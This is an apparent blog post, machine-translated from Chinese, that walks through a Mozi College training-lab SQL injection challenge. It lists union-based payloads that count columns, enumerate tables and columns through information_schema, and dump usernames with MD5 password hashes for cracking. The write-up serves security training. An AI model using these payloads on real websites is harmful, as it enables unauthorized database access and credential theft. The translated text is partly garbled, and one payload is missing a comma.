当前位置:网站首页>Mozi college SQL injection solution
Mozi college SQL injection solution
2020-11-08 09:40:00 【osc_7bgz0no1】
One · Judgment injection
Input id=1, Normal return . Input id=-1 Returns an error . from This shows that there is injection .
Two · Judgment fields
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 An error at this time , The description has four fields
3、 ... and · Use union Query injection point
Input union select 1,2,3,4
Find out 2,3 For the obvious note point
Four · Use database() Chaku name
Input union select 1,database(),3,4
Find out the name of the library mozhe_Discuz_StormGroup
5、 ... and · Look up the name of the table
Input
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
Query to StormGroup_member,notice
See member, So doubt about the first one . So first look up the first .
6、 ... and · Inquire about StormGroup_member The fields stored in the
Input
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
Query out id,name,password,status
7、 ... and · Query password and user name
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
obtain md5 Encrypted value . To decrypt , Get the code .
If the password is wrong , adopt limit m,n To continue with the inquiry .
8、 ... and · Submit key
After getting the password, you can see key, Copy , Submit .
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
边栏推荐
- Ulab 1.0.0 release
- What? Your computer is too bad? You can handle these moves! (win10 optimization tutorial)
- Cloud alibabab notes come out, the whole network detailed explanation only this one hand is slow
- Dogs can also operate drones! You're right, but it's actually an autonomous drone - you know
- Is blazor ready to serve the enterprise?
- PerconaXtraDBCluster8.0 最详尽用法指南
- Littlest JupyterHub| 02 使用nbgitpuller分发共享文件
- ASP.NET MVC下基于异常处理的完整解决方案
- More than 50 object detection datasets from different industries
- i5 1135g7和i5 1035g1参数对比区别大吗? 哪个好
猜你喜欢
Function periodic table filter value selectedvalue
Japan PSE certification
高并发,你真的理解透彻了吗?
Six key points of data science interview
Is blazor ready to serve the enterprise?
Astra: the future of Apache Cassandra is cloud native
Japan PSE certification
ASP.NET A complete solution based on exception handling in MVC
仅用六种字符来完成Hello World,你能做到吗?
AMD Zen3首发评测:频率超5GHz,IPC提升不止19%,这次真的Yes了 - 知乎
随机推荐
Windows下子系统Ubuntu安装
nvm
Is there a big difference between i5 1135g7 and i51035g1? Which is better?
Mate 40 series launch with Huawei sports health service to bring healthy digital life
Recommend an economic science video, very valuable!
OSChina 周日乱弹 —— 之前呢,我一直以为自己是个……
你搞不懂与别人的差距,永远成不了架构师!月薪15K和月薪65K,你差在那了?
双向LSTM在时间序列异常值检测的应用
Function periodic table filter value selectedvalue
Oops, the system is under attack again
仅用六种字符来完成Hello World,你能做到吗?
[data structure Python description] use hash table to manually implement a dictionary class based on Python interpreter
print( 'Hello,NumPy!' )
Six key points of data science interview
An error occurred while starting the kernel was successfully resolved
IQKeyboardManager 源代码看看
Adobe Prelude /Pl 2020软件安装包(附安装教程)
“智能5G”引领世界,数位智能网优+5G能带来什么?
Shiyou's numerical analysis assignment
Unparseable date: 'mon Aug 15 11:24:39 CST 2016', time format conversion exception